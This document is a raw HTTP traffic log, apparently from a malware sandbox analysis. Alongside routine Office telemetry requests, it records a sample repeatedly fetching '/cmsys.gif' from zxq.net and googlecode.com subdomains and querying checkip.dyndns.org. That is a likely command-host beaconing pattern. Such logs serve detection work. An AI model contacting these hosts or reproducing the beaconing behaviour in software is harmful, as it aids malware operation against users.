                    Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
